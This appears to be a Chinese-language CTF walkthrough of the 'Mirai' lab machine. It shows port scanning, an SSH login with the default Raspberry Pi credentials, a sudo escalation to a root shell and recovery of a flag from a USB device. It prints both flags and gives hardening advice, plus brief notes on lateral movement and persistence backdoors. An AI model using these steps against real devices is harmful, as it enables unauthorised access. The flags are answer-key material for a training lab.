[Meachines] [Easy] Mirai Raspberry树莓派默认用户登录+USB挂载文件读取
字数 1124 2025-08-20 18:18:23

Mirai Raspberry树莓派渗透测试教学文档

1. 目标信息收集

1.1 初始扫描

使用Nmap进行端口扫描:

nmap -p- 10.10.10.48 --min-rate 1000 -sC -sV

扫描结果:

  • 22/tcp: OpenSSH 6.7p1 Debian 5+deb8u3
  • 53/tcp: dnsmasq 2.76
  • 80/tcp: lighttpd 1.4.35
  • 1276/tcp: Platinum UPnP 1.0.5.13
  • 32400/tcp: Plex Media Server httpd
  • 32469/tcp: Platinum UPnP 1.0.5.13

1.2 Web目录枚举

使用Gobuster进行目录扫描:

gobuster dir -u "http://10.10.10.48/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50

2. 初始访问

2.1 默认凭证利用

发现目标系统为树莓派,尝试使用默认凭证:

  • 用户名:pi
  • 密码:raspberry

通过SSH登录:

ssh pi@10.10.10.48

成功获取第一个flag:

User.txt: ff837707441b257a20e32199d7c8838d

3. 权限提升

3.1 检查sudo权限

检查当前用户可用的sudo权限:

sudo -l

3.2 直接获取root权限

发现可以直接使用sudo获取root shell:

sudo /bin/bash

3.3 检查挂载设备

检查系统挂载的设备:

lsblk
df -h

3.4 读取USB存储设备内容

发现挂载的USB设备,读取其中的文件:

cat /media/usbstick/damnit.txt

使用strings命令检查原始设备:

strings /dev/sdb

成功获取root flag:

Root.txt: 3d3e483143ff12ec505d026fa13e020b

4. 漏洞总结

  1. 默认凭证漏洞

    • 树莓派系统保留了默认用户名(pi)和密码(raspberry)
    • 管理员未修改默认凭证,导致攻击者可以直接登录系统
  2. 权限配置不当

    • pi用户被配置了无密码sudo权限
    • 允许用户直接通过sudo获取root shell
  3. 敏感信息存储不当

    • root flag存储在未加密的USB设备中
    • 设备挂载后可直接读取敏感信息

5. 安全建议

  1. 修改默认凭证

    • 首次使用树莓派时应立即修改默认密码
    • 考虑禁用默认pi用户,创建新管理员账户
  2. 合理配置sudo权限

    • 避免授予用户无限制的sudo权限
    • 使用最小权限原则,仅授予必要的命令权限
  3. 加密存储敏感数据

    • 对存储敏感信息的移动设备进行加密
    • 使用LUKS等工具加密USB存储设备
  4. 定期安全更新

    • 保持系统软件包更新至最新版本
    • 特别是SSH服务等关键组件
  5. 网络服务加固

    • 关闭不必要的网络服务
    • 对必须开放的服务配置适当的访问控制

6. 扩展思考

  1. 横向移动可能性

    • 检查同一网络中的其他设备是否使用相同凭证
    • 利用获取的权限扫描内网其他主机
  2. 持久化后门

    • 攻击者可创建隐藏用户或SSH密钥实现持久化
    • 可植入定时任务或服务维持访问
  3. 数据泄露风险

    • 检查系统是否存储其他敏感信息
    • 查找数据库凭证、配置文件等

通过此案例可以看出,即使是简单的默认凭证问题也可能导致系统完全沦陷,强调了基础安全配置的重要性。

Mirai Raspberry树莓派渗透测试教学文档 1. 目标信息收集 1.1 初始扫描 使用Nmap进行端口扫描: 扫描结果: 22/tcp: OpenSSH 6.7p1 Debian 5+deb8u3 53/tcp: dnsmasq 2.76 80/tcp: lighttpd 1.4.35 1276/tcp: Platinum UPnP 1.0.5.13 32400/tcp: Plex Media Server httpd 32469/tcp: Platinum UPnP 1.0.5.13 1.2 Web目录枚举 使用Gobuster进行目录扫描: 2. 初始访问 2.1 默认凭证利用 发现目标系统为树莓派,尝试使用默认凭证: 用户名:pi 密码:raspberry 通过SSH登录: 成功获取第一个flag: 3. 权限提升 3.1 检查sudo权限 检查当前用户可用的sudo权限: 3.2 直接获取root权限 发现可以直接使用sudo获取root shell: 3.3 检查挂载设备 检查系统挂载的设备: 3.4 读取USB存储设备内容 发现挂载的USB设备,读取其中的文件: 使用strings命令检查原始设备: 成功获取root flag: 4. 漏洞总结 默认凭证漏洞 : 树莓派系统保留了默认用户名(pi)和密码(raspberry) 管理员未修改默认凭证,导致攻击者可以直接登录系统 权限配置不当 : pi用户被配置了无密码sudo权限 允许用户直接通过sudo获取root shell 敏感信息存储不当 : root flag存储在未加密的USB设备中 设备挂载后可直接读取敏感信息 5. 安全建议 修改默认凭证 : 首次使用树莓派时应立即修改默认密码 考虑禁用默认pi用户,创建新管理员账户 合理配置sudo权限 : 避免授予用户无限制的sudo权限 使用最小权限原则,仅授予必要的命令权限 加密存储敏感数据 : 对存储敏感信息的移动设备进行加密 使用LUKS等工具加密USB存储设备 定期安全更新 : 保持系统软件包更新至最新版本 特别是SSH服务等关键组件 网络服务加固 : 关闭不必要的网络服务 对必须开放的服务配置适当的访问控制 6. 扩展思考 横向移动可能性 : 检查同一网络中的其他设备是否使用相同凭证 利用获取的权限扫描内网其他主机 持久化后门 : 攻击者可创建隐藏用户或SSH密钥实现持久化 可植入定时任务或服务维持访问 数据泄露风险 : 检查系统是否存储其他敏感信息 查找数据库凭证、配置文件等 通过此案例可以看出,即使是简单的默认凭证问题也可能导致系统完全沦陷,强调了基础安全配置的重要性。